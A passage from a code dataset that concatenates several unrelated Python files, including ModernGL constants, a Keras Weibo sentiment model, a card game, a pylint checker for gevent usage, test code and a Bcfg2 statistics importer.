mgl.LINE_LOOP = 'LINE_LOOP'\n mgl.POINTS = 'POINTS'\n mgl.LINE_STRIP_ADJACENCY = 'LINE_STRIP_ADJACENCY'\n mgl.LINES_ADJACENCY = 'LINES_ADJACENCY'\n mgl.TRIANGLE_STRIP_ADJACENCY = 'TRIANGLE_STRIP_ADJACENCY'\n mgl.TRIANGLES_ADJACENCY = 'TRIANGLES_ADJACENCY'\n\n mgl.Error = Exception\n\n\nError = mgl.Error\n\n\nclass InvalidObject:\n '''\n A ModernGL object turns into an InvalidObject\n once the ``release()`` method is successfully called.\n '''\n\n\nclass EnableFlag:\n '''\n EnableFlag\n '''\n\n def __init__(self):\n self.mglo = None\n raise NotImplementedError('EnableFlag')\n\n @staticmethod\n def new(obj) -> 'EnableFlag':\n '''\n For internal use only.\n '''\n\n res = EnableFlag.__new__(EnableFlag)\n res.mglo = obj\n return res\n\n\nBLEND = EnableFlag.new(mgl.BLEND)\n'''\n GL_BLEND\n'''\n\nDEPTH_TEST = EnableFlag.new(mgl.DEPTH_TEST)\n'''\n GL_DEPTH_TEST\n'''\n\nCULL_FACE = EnableFlag.new(mgl.CULL_FACE)\n'''\n GL_CULL_FACE\n'''\n\nMULTISAMPLE = EnableFlag.new(mgl.MULTISAMPLE)\n'''\n GL_MULTISAMPLE\n'''\n\n\nclass Primitive:\n '''\n Primitive\n '''\n\n def __init__(self):\n self.mglo = None\n raise NotImplementedError('Primitive')\n\n @staticmethod\n def new(obj) -> 'Primitive':\n '''\n For internal use only.\n '''\n\n res = Primitive.__new__(Primitive)\n res.mglo = obj\n return res\n\n\nTRIANGLES = Primitive.new(mgl.TRIANGLES)\n'''\n GL_TRIANGLES\n'''\n\nTRIANGLE_STRIP = Primitive.new(mgl.TRIANGLE_STRIP)\n'''\n GL_TRIANGLE_STRIP\n'''\n\nTRIANGLE_FAN = Primitive.new(mgl.TRIANGLE_FAN)\n'''\n GL_TRIANGLE_FAN\n'''\n\nLINES = Primitive.new(mgl.LINES)\n'''\n GL_LINES\n'''\n\nLINE_STRIP = Primitive.new(mgl.LINE_STRIP)\n'''\n GL_LINE_STRIP\n'''\n\nLINE_LOOP = Primitive.new(mgl.LINE_LOOP)\n'''\n GL_LINE_LOOP\n'''\n\nPOINTS = Primitive.new(mgl.POINTS)\n'''\n GL_POINTS\n'''\n\nLINE_STRIP_ADJACENCY = Primitive.new(mgl.LINE_STRIP_ADJACENCY)\n'''\n GL_LINE_STRIP_ADJACENCY\n'''\n\nLINES_ADJACENCY = Primitive.new(mgl.LINES_ADJACENCY)\n'''\n GL_LINES_ADJACENCY\n'''\n\nTRIANGLE_STRIP_ADJACENCY = Primitive.new(mgl.TRIANGLE_STRIP_ADJACENCY)\n'''\n GL_TRIANGLE_STRIP_ADJACENCY\n'''\n\nTRIANGLES_ADJACENCY = Primitive.new(mgl.TRIANGLES_ADJACENCY)\n'''\n GL_TRIANGLES_ADJACENCY\n'''\n\nPRIMITIVES = {\n mgl.TRIANGLES: TRIANGLES,\n mgl.TRIANGLE_STRIP: TRIANGLE_STRIP,\n mgl.TRIANGLE_FAN: TRIANGLE_FAN,\n mgl.LINES: LINES,\n mgl.LINE_STRIP: LINE_STRIP,\n mgl.LINE_LOOP: LINE_LOOP,\n mgl.POINTS: POINTS,\n mgl.LINE_STRIP_ADJACENCY: LINE_STRIP_ADJACENCY,\n mgl.LINES_ADJACENCY: LINES_ADJACENCY,\n mgl.TRIANGLE_STRIP_ADJACENCY: TRIANGLE_STRIP_ADJACENCY,\n mgl.TRIANGLES_ADJACENCY: TRIANGLES_ADJACENCY,\n None: None,\n}\n'''\n PRIMITIVES\n'''\n\n\nclass Version:\n '''\n Version\n '''\n\n def __init__(self, major, minor):\n self._major = major\n self._minor = minor\n\n @property\n def major(self) -> int:\n '''\n major\n '''\n\n return self._major\n\n @property\n def minor(self) -> int:\n '''\n minor\n '''\n\n return self._minor\n\n\nCORE_330 = Version(3, 3)\n'''\n OpenGL 3.3\n'''\n\nCORE_400 = Version(4, 0)\n'''\n OpenGL 4.0\n'''\n\nCORE_410 = Version(4, 1)\n'''\n OpenGL 4.1\n'''\n\nCORE_420 = Version(4, 2)\n'''\n OpenGL 4.2\n'''\n\nCORE_430 = Version(4, 3)\n'''\n OpenGL 4.3\n'''\n\nCORE_440 = Version(4, 4)\n'''\n OpenGL 4.4\n'''\n\nCORE_450 = Version(4, 5)\n'''\n OpenGL 4.5\n'''\n","sub_path":"ModernGL/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"616346079","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 26 10:18:44 2016\n微博情感分析模型\n@author: yangxinwei\n\"\"\"\nfrom __future__ import print_function\nfrom pandas import Series\nfrom jieba import cut\nimport os\n#import matplotlib.pyplot as plt\n#from matplotlib import style\n#import time\nimport numpy as np\nimport re\nimport json\nimport codecs\nfrom keras.preprocessing.sequence import pad_sequences\n#from keras.utils.np_utils import to_categorical\nfrom keras.layers import Dense, Input, Flatten, Conv1D, MaxPooling1D, Embedding\nfrom keras.models import Model\n\n\n# create model's dir\nbasedir = os.path.abspath(os.path.dirname(__file__))\nworkdir = os.path.join(basedir, 'model')\nif not os.path.exists(workdir):\n os.mkdir(workdir)\n \ncorpusdir = os.path.join(workdir,'weibo_corpus.json')\n \n# 1、分词并去掉停用词\ndef cut_and_filter(s):\n if type(s) == unicode or str:\n if type(s) == str:\n s = s.decode('utf-8')\n ws = []\n s = re.sub(\"(\\d+)|(\\s+)\", \"\", s)# 去掉数字和空格\n for w in cut(s):\n if len(w) > 1:\n ws.append(w)\n return ws\n else:\n raise Exception('input type must be unicode')\n \n# 2、建立微博语料库\ndef create_corpus(docs, max_words = 10000):\n words = []\n for i in docs:\n words.extend(i)\n wordcount = Series(words).value_counts()\n wordcount = wordcount[:max_words]\n wordcount[:] = xrange(1, max_words + 1)\n wordcount.to_json(corpusdir, force_ascii=False)\n #wordcount.to_csv(corpusdir, header=None, encoding='utf-8')\n print(u'完成建立语料库')\n return wordcount\n \n# 3、载入语料库\ndef load_corpus(fpath=corpusdir):\n with codecs.open(corpusdir, 'r', encoding='utf-8') as f:\n corpus = json.loads(f.read())\n #corpus = pd.read_csv(fpath, index_col=0, header=None, encoding='utf-8')\n #print(corpus)\n #corpus = corpus.to_dict()\n return corpus\n \ncorpus = load_corpus()\n\n# 4、向量化\ndef doc2vec(doc):\n vec = []\n for w in doc:\n if w in corpus:\n vec.append(corpus[w])\n return vec\n\n# 5、基于CNN的模型\nclass WeiboModel(object):\n def __init__(self):\n self.model = None\n self.history = None\n self.MAX_SEQUENCE_LENGTH = 100\n self.VALIDATION_SPLIT = 0.15\n\n self.EMBEDDING_DIM = 100\n self.BATCH_SIZE = 32\n self.NB_EPOCH = 2\n\n def pad_data(self, x):\n x = pad_sequences(x, maxlen = self.MAX_SEQUENCE_LENGTH)\n return x\n\n def split_data(self, x, y):\n indices = np.arange(x.shape[0])\n np.random.shuffle(indices)\n x = x[indices]\n y = y[indices]\n nb_validation_samples = int(self.VALIDATION_SPLIT * x.shape[0])\n x_train = x[:-nb_validation_samples]\n y_train = y[:-nb_validation_samples]\n x_val = x[-nb_validation_samples:]\n y_val = y[-nb_validation_samples:]\n return (x_train, y_train, x_val, y_val)\n\n def train(self, x_train, y_train, x_val, y_val): \n print('Training model........................')\n embedding_layer = Embedding(input_dim = len(corpus) + 1,\n output_dim = self.EMBEDDING_DIM,\n input_length = self.MAX_SEQUENCE_LENGTH)\n\n # train a 1D convnet with global maxpooling\n sequence_input = Input(shape=(self.MAX_SEQUENCE_LENGTH,), dtype='int32')\n embedded_sequences = embedding_layer(sequence_input)\n x = Conv1D(nb_filter=128, filter_length=3, activation='relu')(embedded_sequences)\n x = MaxPooling1D(pool_length=2)(x)\n #x = Conv1D(128, 5, activation='relu')(x)\n #x = MaxPooling1D(5)(x)\n #x = Conv1D(128, 5, activation='relu')(x)\n #x = MaxPooling1D(35)(x) # global max pooling\n x = Flatten()(x)\n x = Dense(128, activation='relu')(x)\n preds = Dense(1, activation='sigmoid')(x)\n\n self.model = Model(sequence_input, preds)\n self.model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n self.history = self.model.fit(x_train, y_train, validation_data=(x_val, y_val),\n nb_epoch=self.NB_EPOCH, batch_size=self.BATCH_SIZE, verbose=2)\n return self.model\n\n def predict(self, x):\n y_pre = self.model.predict(x, batch_size=self.BATCH_SIZE, verbose=1)\n return y_pre\n\n def evaluate(self, x, y):\n precision = self.model.evaluate(x, y, batch_size=self.BATCH_SIZE, verbose=1)\n return precision\n\n def save_model(self):\n json_string = self.model.to_json()\n open(os.path.join(workdir, 'weibo_model_architecture.json'), 'w').write(json_string)\n self.model.save_weights(os.path.join(workdir, 'weibo_model_weights.h5'))\n print(u'保存模型成功')\n return self.model\n\n def load_model(self):\n from keras.models import model_from_json\n self.model = model_from_json(open(os.path.join(workdir, 'weibo_model_architecture.json')).read())\n self.model.load_weights(os.path.join(workdir, 'weibo_model_weights.h5'))\n #print(u'载入模型成功')\n return self.model\n\n\n","sub_path":"Weibo_Model.py","file_name":"Weibo_Model.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445253846","text":"# Import function randint from module random\nfrom random import randint\n\n# Level 1 - one player.\n# Level 2 - one player + one bot.\n# Level 3 - one player + two bots.\n\n# Rules\ndeck = 10\nvictory_rule = 21 # max score. After max score gamer is lose\ncard_min = 2\ncard_max = 11\n\n# Bots strength\nbot_rule_1 = 19 # exemple for fixed score bot in pick\nbot_rule_2 = 50 # exemple for dynamic score bot in percents, where 50 is never taking card, if probability of success less or equil equal to 50%, not 0!\n\nlevel = int(input(\"Game with 1 Bot input 1, game with 2 Bots input 2, game myself input 0 or other symbol \"))\n\ndecision_0 = 1 # user decision, 1 - if user are continue gaming\ndecision_1 = 0\ndecision_2 = 0\n\nbot_pick_0 = 0 # user pick\nbot_pick_1 = 0\nbot_pick_2 = 0\n\nif level !=1 and level != 2:\n level = 0\nelif level == 1:\n decision_1 = 1\nelif level == 2:\n decision_1 = 1\n decision_2 = 1\n\nwhile (decision_0 or decision_1 or decision_2) and deck:\n\n # user\n # user step\n if decision_0:\n print(\"Your pick is\", bot_pick_0, \"and remaining deck is\", deck)\n decision_0 = int(input('Input \"1\" to take more or input \"0\" to pass '))\n if decision_0:\n deck -= 1\n bot_pick_0 += randint(card_min, card_max)\n\n # user check\n if bot_pick_0 > victory_rule:\n bot_pick_0 = -1\n decision_0 = 0 \n\n # bot 1\n # bot 1 step\n if level > 0 and deck and decision_1:\n if bot_pick_1 >= bot_rule_1:\n decision_1 = 0\n if decision_1:\n deck -= 1\n bot_pick_1 += randint(card_min, card_max)\n\n # bot 1 check\n if bot_pick_1 > victory_rule:\n bot_pick_1 = -1\n decision_1 = 0 \n\n # bot 2\n # bot 2 step\n if level > 1 and deck and decision_2:\n if card_min > (victory_rule - bot_pick_2):\n decision_2 = 0\n elif card_max > (victory_rule - bot_pick_2) and (card_max + card_min) > (100 / bot_rule_2) * (victory_rule - bot_pick_2):\n decision_2 = 0\n \n if decision_2:\n deck -= 1\n bot_pick_2 += randint(card_min, card_max)\n\n # bot 2 check\n if bot_pick_2 > victory_rule:\n bot_pick_2 = -1\n decision_2 = 0\n\nmax_pick = bot_pick_0\n\nif level > 0 and max_pick < bot_pick_1:\n max_pick = bot_pick_1 \n\nif level > 1 and max_pick < bot_pick_2:\n max_pick = bot_pick_2\n\nprint(\"remaining deck\", deck)\n\nif max_pick < 0:\n print(\"all gamers and user are loser\")\nelse: \n if bot_pick_0 == max_pick:\n print(\"user is winner with score\", max_pick)\n elif bot_pick_0 > 0:\n print(\"user is loser with score\", bot_pick_0)\n else:\n print(\"user is loser with over score points\")\n\n if level > 0:\n if bot_pick_1 == max_pick:\n print(\"bot 1 is winner with score\", max_pick)\n elif bot_pick_1 > 0:\n print(\"bot 1 is loser with score\", bot_pick_1)\n else:\n print(\"bot 1 is loser with over score points\")\n \n if level > 1:\n if bot_pick_2 == max_pick:\n print(\"bot 2 is winner with score\", max_pick)\n elif bot_pick_2 > 0:\n print(\"bot 2 is loser with score\", bot_pick_2)\n else:\n print(\"bot 2 is loser with over score points\")\n\n\n\n \n","sub_path":"kirill_kravchenko/01/home_01.py","file_name":"home_01.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"23876213","text":"from astroid.exceptions import InferenceError\nfrom pylint.checkers import BaseChecker\nfrom pylint.interfaces import IAstroidChecker\n\nJOINALL_ID = \"gevent-joinall\"\nJOINALL_MSG = (\n \"First argument of joinall must have type set to avoid deadlocks. NOTE: set \"\n \"comprehensions are false positives, use `set()` instead.\"\n)\nJOINALL_RAISE_ERROR_ID = \"gevent-joinall-raise-error\"\nJOINALL_RAISE_ERROR_MSG = (\n \"`joinall` should always re-raise exceptions from the underlying greenlets, \"\n \"otherwise errors can be lost and the program will continue in an \"\n \"undertermined state.\"\n)\nGROUP_DISABLE_WAIT_ID = \"gevent-disable-wait\"\nGROUP_DISABLE_WAIT_MSG = (\n \"Just calling `gevent.wait` hides errors, since exceptions that killed the \"\n \"underlying greenlet are swallowed. Instead \"\n \"`gevent.joinall(raise_error=True)` should be used\"\n)\nGROUP_JOIN_ID = \"gevent-group-join\"\nGROUP_JOIN_MSG = (\n \"When calling `Group.join` or `Pool.join` the flag `raise_error` must be set to \"\n \"`True`, otherwise exceptions will go unoticed.\"\n)\n\n\ndef is_gevent_joinall(inferred_func):\n return (\n inferred_func.name == \"joinall\"\n and inferred_func.callable()\n and inferred_func.root().name.startswith(\"gevent\")\n )\n\n\ndef is_gevent_wait(inferred_func):\n \"\"\"Note that `wait` is an alias to wait_on_objects set in the __init__.py,\n the inferred_func will have the original name instead of the alias name.\n \"\"\"\n return (\n inferred_func.name == \"wait_on_objects\"\n and inferred_func.callable()\n and inferred_func.root().name.startswith(\"gevent\")\n )\n\n\ndef is_group_join(inferred_func):\n # This intetionally does not check the class, as of gevent 1.5a3 it matches\n # Group and Pool, which are the classes that need to be checked.\n return (\n inferred_func.name == \"join\"\n and inferred_func.callable()\n and inferred_func.root().name == \"gevent.pool\"\n )\n\n\ndef is_of_type(inferred_value, type_):\n return inferred_value is type_\n\n\ndef register(linter):\n linter.register_checker(GeventChecker(linter))\n\n\nclass GeventChecker(BaseChecker):\n __implements__ = IAstroidChecker\n\n name = \"gevent\"\n priority = -1\n msgs = {\n \"E6491\": (JOINALL_MSG, JOINALL_ID, \"Waiting with joinall on a non set is an error.\"),\n \"E6493\": (\n GROUP_JOIN_MSG,\n GROUP_JOIN_ID,\n \"Waiting with Group.join without raise_error set to True.\",\n ),\n \"E6495\": (\n GROUP_DISABLE_WAIT_MSG,\n GROUP_DISABLE_WAIT_ID,\n \"gevent.wait should not be used, use gevent.joinall(raise_error=True) instead.\",\n ),\n \"E6496\": (\n JOINALL_RAISE_ERROR_MSG,\n JOINALL_RAISE_ERROR_ID,\n \"`gevent.joinall` always need `raise_error=True` set.\",\n ),\n }\n\n def visit_call(self, node):\n \"\"\"Called on expressions of the form `expr()`, where `expr` is a simple\n name e.g. `f()` or a path e.g. `v.f()`.\n \"\"\"\n try:\n self._force_joinall_to_use_set(node)\n except InferenceError:\n pass\n\n try:\n self._force_joinall_to_set_raise_error(node)\n except InferenceError:\n pass\n\n try:\n self._force_joinall_instead_of_wait(node)\n except InferenceError:\n pass\n\n try:\n self._force_group_join_to_set_raise_error(node)\n except InferenceError:\n pass\n\n def _force_joinall_to_use_set(self, node):\n \"\"\"This detect usages of the form:\n\n >>> from gevent import joinall\n >>> joinall(...)\n\n or:\n\n >>> import gevent\n >>> gevent.joinall(...)\n \"\"\"\n for inferred_func in node.func.infer():\n if is_gevent_joinall(inferred_func):\n\n try:\n is_every_value_a_set = all(\n inferred_first_arg.pytype() == \"builtins.set\"\n for inferred_first_arg in node.args[0].infer()\n )\n except InferenceError:\n is_every_value_a_set = False\n\n if not is_every_value_a_set:\n self.add_message(JOINALL_ID, node=node)\n\n def _force_joinall_to_set_raise_error(self, node):\n \"\"\"This detect usages of the form:\n\n >>> from gevent import joinall\n >>> joinall(..., raise_error=True)\n\n or:\n\n >>> import gevent\n >>> gevent.joinall(..., raise_error=True)\n \"\"\"\n for inferred_func in node.func.infer():\n if is_gevent_joinall(inferred_func):\n is_raise_error_true = False\n\n # This check won't work with positional arguments, which should\n # be fine, since `pool.join(None, True)` is not very readable.\n if node.keywords is not None:\n is_raise_error_true = any(\n keyword.arg == \"raise_error\" and keyword.value.value is True\n for keyword in node.keywords\n )\n\n if not is_raise_error_true:\n self.add_message(JOINALL_RAISE_ERROR_ID, node=node)\n\n def _force_joinall_instead_of_wait(self, node):\n \"\"\"This detect usages of the form:\n\n >>> from gevent import joinall\n >>> joinall(..., raise_error=True)\n\n or:\n\n >>> import gevent\n >>> gevent.joinall(..., raise_error=True)\n \"\"\"\n for inferred_func in node.func.infer():\n if is_gevent_wait(inferred_func):\n self.add_message(GROUP_DISABLE_WAIT_ID, node=node)\n\n def _force_group_join_to_set_raise_error(self, node):\n \"\"\"This detect usages of the form:\n\n >>> from gevent.pool import Group, Pool\n >>> g = Group()\n >>> g.join(...)\n >>> p = Pool()\n >>> p.join(...)\n \"\"\"\n for inferred_func in node.func.infer():\n if is_group_join(inferred_func):\n is_raise_error_true = False\n\n # This check won't work with positional arguments, which should\n # be fine, since `pool.join(None, True)` is not very readable.\n if node.keywords is not None:\n is_raise_error_true = any(\n keyword.arg == \"raise_error\" and keyword.value.value is True\n for keyword in node.keywords\n )\n\n if not is_raise_error_true:\n self.add_message(JOINALL_ID, node=node)\n","sub_path":"tools/pylint/gevent_checker.py","file_name":"gevent_checker.py","file_ext":"py","file_size_in_byte":6632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"161034192","text":"import cfg\nfrom random import randint\n\n# Define a Jogada do BOT\ndef bot():\n lista_bot = ['PAPEL', 'PEDRA', 'TESOURA']\n jogada_bot = lista_bot[randint(0,2)]\n return jogada_bot\n\n# Compara a jogada do Jogador com a do Bot \n# e define os pontos a serem somados ou subtraidos \ndef batalha(jogador, bot):\n if (jogador == bot):\n pontos = cfg.pontosEmpatar\n elif (jogador == \"PAPEL\" and bot == \"PEDRA\"):\n pontos = cfg.pontosGanhar\n elif (jogador == \"PEDRA\" and bot == \"TESOURA\"):\n pontos = cfg.pontosGanhar\n elif (jogador == \"TESOURA\" and bot == \"PAPEL\"):\n pontos = cfg.pontosGanhar\n else:\n pontos = cfg.pontosPerder\n pass\n return pontos\n\n# Atualiza o Placar no arquivo TXT\ndef atualizarPlacar(dados):\n lista = []\n final = \"\"\n\n for line in open('rank.txt'):\n lista.append(line)\n\n dados = \"\\n\" + str(dados)\n lista.append(dados)\n \n for i in lista:\n final = final + i\n\n print(final)\n\n placar = open(\"rank.txt\", \"+w\")\n placar.write(final)","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"94569173","text":"\"\"\"\n\nCreated by: Nathan Starkweather\nCreated on: 02/24/2014\nCreated in: PyCharm Community Edition\n\n\n\"\"\"\nfrom shutil import rmtree\n\n__author__ = 'Nathan Starkweather'\n\nimport unittest\nimport scripts.tpid.tpidmany as tpidmany\nimport scripts.test.test_tpid.test_setup as tpid_setup\nfrom os import makedirs\nfrom os.path import dirname, join\n\ncurdir = dirname(__file__)\ntest_dir = dirname(curdir)\ndata_dir = join(curdir, \"data\")\ntemp_dir = join(test_dir, \"temp\", \"tpid_temp\")\n\n\ndef copy_list1(to_copy):\n list_iter = iter(to_copy)\n next(list_iter)\n return [line.copy() for line in list_iter]\n\n\n# noinspection PyProtectedMember\nclass TestStepTests(tpid_setup.TPIDUnittest):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"\n @return:\n @rtype:\n \"\"\"\n super().setUpClass()\n try:\n makedirs(temp_dir)\n except FileExistsError:\n pass\n\n cls.steps_report1 = join(data_dir, \"full_scan_steps_input.csv\")\n cls.data_report1 = join(data_dir, \"full_scan_data_input.csv\")\n\n def test_extract_raw_steps(self):\n \"\"\"\n @return:\n @rtype:\n \"\"\"\n\n extract_raw_steps = tpidmany.extract_raw_steps\n\n expected_extracted_steps = tpid_setup.steps_report1_expected_lines[1:]\n\n result = extract_raw_steps(self.steps_report1)\n for exp_line, res_line in zip(expected_extracted_steps, result):\n self.assertEqual(exp_line, res_line)\n\n def test_extract_test_steps(self):\n \"\"\"\n @return:\n @rtype:\n \"\"\"\n\n extract_test_steps = tpidmany.extract_test_steps\n\n steps = copy_list1(tpid_setup.steps_report1_expected_lines)\n expected_extracted_tests = tpid_setup.steps_report1_expected_test_steps\n result = extract_test_steps(steps)\n\n for exp_line, result_line in zip(expected_extracted_tests, result):\n self.assertEqual(exp_line, result_line)\n\n def test_parse_test_dates(self):\n \"\"\"\n test parse_test_dates function\n @return:\n @rtype:\n \"\"\"\n\n parse_test_dates = tpidmany.parse_test_dates\n expected = tpid_setup.steps_report1_datetimes\n input_tests = tpid_setup.steps_report1_expected_test_steps\n\n assertEqual = self.assertEqual\n result = parse_test_dates(input_tests)\n\n # Slower on failures, but just as fast on passes.\n # Would rather fail slowly with an easy to understand\n # error message.\n try:\n assertEqual(expected, result)\n except self.failureException:\n for in_line, exp_line, res_line in zip(input_tests, expected, result):\n try:\n assertEqual(exp_line, res_line)\n except self.failureException:\n for in_str, exp_dt, res_dt in zip(in_line, exp_line, res_line):\n assertEqual(exp_dt, res_dt, msg=\"Invalid result from input str '%s'\" % in_str)\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"\n @return:\n @rtype:\n \"\"\"\n try:\n rmtree(temp_dir)\n except FileNotFoundError:\n pass\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"archive/test/test_tpid/test_tpid_many_steps.py","file_name":"test_tpid_many_steps.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"409338134","text":"#! /usr/bin/env python\n\"\"\"\nImports statistics.xml and clients.xml files in to database backend for\nnew statistics engine\n\"\"\"\n\nimport os\nimport sys\nimport traceback\ntry:\n import Bcfg2.settings\nexcept Exception:\n e = sys.exc_info()[1]\n sys.stderr.write(\"Failed to load configuration settings. %s\\n\" % e)\n sys.exit(1)\n\nproject_directory = os.path.dirname(Bcfg2.settings.__file__)\nproject_name = os.path.basename(project_directory)\nsys.path.append(os.path.join(project_directory, '..'))\nproject_module = __import__(project_name, '', '', [''])\nsys.path.pop()\n# Set DJANGO_SETTINGS_MODULE appropriately.\nos.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % project_name\n\nfrom Bcfg2.Server.Reports.reports.models import *\nfrom lxml.etree import XML, XMLSyntaxError\nfrom getopt import getopt, GetoptError\nfrom datetime import datetime\nfrom time import strptime\nfrom django.db import connection, transaction\nfrom Bcfg2.Server.Plugins.Metadata import ClientMetadata\nimport logging\nimport Bcfg2.Logger\nimport platform\n\n# Compatibility import\nfrom Bcfg2.Compat import ConfigParser, b64decode\n\n\ndef build_reason_kwargs(r_ent, encoding, logger):\n binary_file = False\n sensitive_file = False\n unpruned_entries = ''\n if r_ent.get('sensitive') in ['true', 'True']:\n sensitive_file = True\n rc_diff = ''\n elif r_ent.get('current_bfile', False):\n binary_file = True\n rc_diff = r_ent.get('current_bfile')\n if len(rc_diff) > 1024 * 1024:\n rc_diff = ''\n elif len(rc_diff) == 0:\n # No point in flagging binary if we have no data\n binary_file = False\n elif r_ent.get('current_bdiff', False):\n rc_diff = b64decode(r_ent.get('current_bdiff'))\n elif r_ent.get('current_diff', False):\n rc_diff = r_ent.get('current_diff')\n else:\n rc_diff = ''\n # detect unmanaged entries in pruned directories\n if r_ent.get('prune', 'false') == 'true' and r_ent.get('qtest'):\n unpruned_elist = [e.get('path') for e in r_ent.findall('Prune')]\n unpruned_entries = \"\\n\".join(unpruned_elist)\n if not binary_file:\n try:\n rc_diff = rc_diff.decode(encoding)\n except:\n logger.error(\"Reason isn't %s encoded, cannot decode it\" % encoding)\n rc_diff = ''\n return dict(owner=r_ent.get('owner', default=\"\"),\n current_owner=r_ent.get('current_owner', default=\"\"),\n group=r_ent.get('group', default=\"\"),\n current_group=r_ent.get('current_group', default=\"\"),\n perms=r_ent.get('perms', default=\"\"),\n current_perms=r_ent.get('current_perms', default=\"\"),\n status=r_ent.get('status', default=\"\"),\n current_status=r_ent.get('current_status', default=\"\"),\n to=r_ent.get('to', default=\"\"),\n current_to=r_ent.get('current_to', default=\"\"),\n version=r_ent.get('version', default=\"\"),\n current_version=r_ent.get('current_version', default=\"\"),\n current_exists=r_ent.get('current_exists', default=\"True\").capitalize() == \"True\",\n current_diff=rc_diff,\n is_binary=binary_file,\n is_sensitive=sensitive_file,\n unpruned=unpruned_entries)\n\ndef _fetch_reason(elem, kargs, logger):\n try:\n rr = None\n try:\n rr = Reason.objects.filter(**kargs)[0]\n except IndexError:\n rr = Reason(**kargs)\n rr.save()\n logger.debug(\"Created reason: %s\" % rr.id)\n except Exception:\n ex = sys.exc_info()[1]\n logger.error(\"Failed to create reason for %s: %s\" % (elem.get('name'), ex))\n rr = Reason(current_exists=elem.get('current_exists',\n default=\"True\").capitalize() == \"True\")\n rr.save()\n return rr\n\n\ndef load_stats(sdata, encoding, vlevel, logger, quick=False, location=''):\n for node in sdata.findall('Node'):\n name = node.get('name')\n for statistics in node.findall('Statistics'):\n try:\n load_stat(name, statistics, encoding, vlevel, logger, quick, location)\n except:\n logger.error(\"Failed to create interaction for %s: %s\" %\n (name, traceback.format_exc().splitlines()[-1]))\n\n@transaction.commit_on_success\ndef load_stat(cobj, statistics, encoding, vlevel, logger, quick, location):\n if isinstance(cobj, ClientMetadata):\n client_name = cobj.hostname\n else:\n client_name = cobj\n client, created = Client.objects.get_or_create(name=client_name)\n if created and vlevel > 0:\n logger.info(\"Client %s added to db\" % client_name)\n\n timestamp = datetime(*strptime(statistics.get('time'))[0:6])\n ilist = Interaction.objects.filter(client=client,\n timestamp=timestamp)\n if ilist:\n current_interaction = ilist[0]\n if vlevel > 0:\n logger.info(\"Interaction for %s at %s with id %s already exists\" % \\\n (client.id, timestamp, current_interaction.id))\n return\n else:\n newint = Interaction(client=client,\n timestamp=timestamp,\n state=statistics.get('state',\n default=\"unknown\"),\n repo_rev_code=statistics.get('revision',\n default=\"unknown\"),\n goodcount=statistics.get('good',\n default=\"0\"),\n totalcount=statistics.get('total',\n default=\"0\"),\n server=location)\n newint.save()\n current_interaction = newint\n if vlevel > 0:\n logger.info(\"Interaction for %s at %s with id %s INSERTED in to db\" % (client.id,\n timestamp, current_interaction.id))\n\n if isinstance(cobj, ClientMetadata):\n try:\n imeta = InteractionMetadata(interaction=current_interaction)\n profile, created = Group.objects.get_or_create(name=cobj.profile)\n imeta.profile = profile\n imeta.save() # save here for m2m\n\n #FIXME - this should be more efficient\n group_set = []\n for group_name in cobj.groups:\n group, created = Group.objects.get_or_create(name=group_name)\n if created:\n logger.debug(\"Added group %s\" % group)\n imeta.groups.add(group)\n for bundle_name in cobj.bundles:\n bundle, created = Bundle.objects.get_or_create(name=bundle_name)\n if created:\n logger.debug(\"Added bundle %s\" % bundle)\n imeta.bundles.add(bundle)\n imeta.save()\n except:\n logger.error(\"Failed to save interaction metadata for %s: %s\" %\n (client_name, traceback.format_exc().splitlines()[-1]))\n\n\n entries_cache = {}\n [entries_cache.__setitem__((e.kind, e.name), e) \\\n for e in Entries.objects.all()]\n counter_fields = {TYPE_BAD: 0,\n TYPE_MODIFIED: 0,\n TYPE_EXTRA: 0}\n pattern = [('Bad/*', TYPE_BAD),\n ('Extra/*', TYPE_EXTRA),\n ('Modified/*', TYPE_MODIFIED)]\n for (xpath, type) in pattern:\n for x in statistics.findall(xpath):\n counter_fields[type] = counter_fields[type] + 1\n rr = _fetch_reason(x, build_reason_kwargs(x, encoding, logger), logger)\n\n try:\n entry = entries_cache[(x.tag, x.get('name'))]\n except KeyError:\n entry, created = Entries.objects.get_or_create(\\\n name=x.get('name'), kind=x.tag)\n\n Entries_interactions(entry=entry, reason=rr,\n interaction=current_interaction,\n type=type).save()\n if vlevel > 0:\n logger.info(\"%s interaction created with reason id %s and entry %s\" % (xpath, rr.id, entry.id))\n\n # add good entries\n good_reason = None\n for x in statistics.findall('Good/*'):\n if good_reason == None:\n # Do this once. Really need to fix Reasons...\n good_reason = _fetch_reason(x, build_reason_kwargs(x, encoding, logger), logger)\n try:\n entry = entries_cache[(x.tag, x.get('name'))]\n except KeyError:\n entry, created = Entries.objects.get_or_create(\\\n name=x.get('name'), kind=x.tag)\n Entries_interactions(entry=entry, reason=good_reason,\n interaction=current_interaction,\n type=TYPE_GOOD).save()\n if vlevel > 0:\n logger.info(\"%s interaction created with reason id %s and entry %s\" % (xpath, good_reason.id, entry.id))\n\n # Update interaction counters\n current_interaction.bad_entries = counter_fields[TYPE_BAD]\n current_interaction.modified_entries = counter_fields[TYPE_MODIFIED]\n current_interaction.extra_entries = counter_fields[TYPE_EXTRA]\n current_interaction.save()\n\n mperfs = []\n for times in statistics.findall('OpStamps'):\n for metric, value in list(times.items()):\n mmatch = []\n if not quick:\n mmatch = Performance.objects.filter(metric=metric, value=value)\n\n if mmatch:\n mperf = mmatch[0]\n 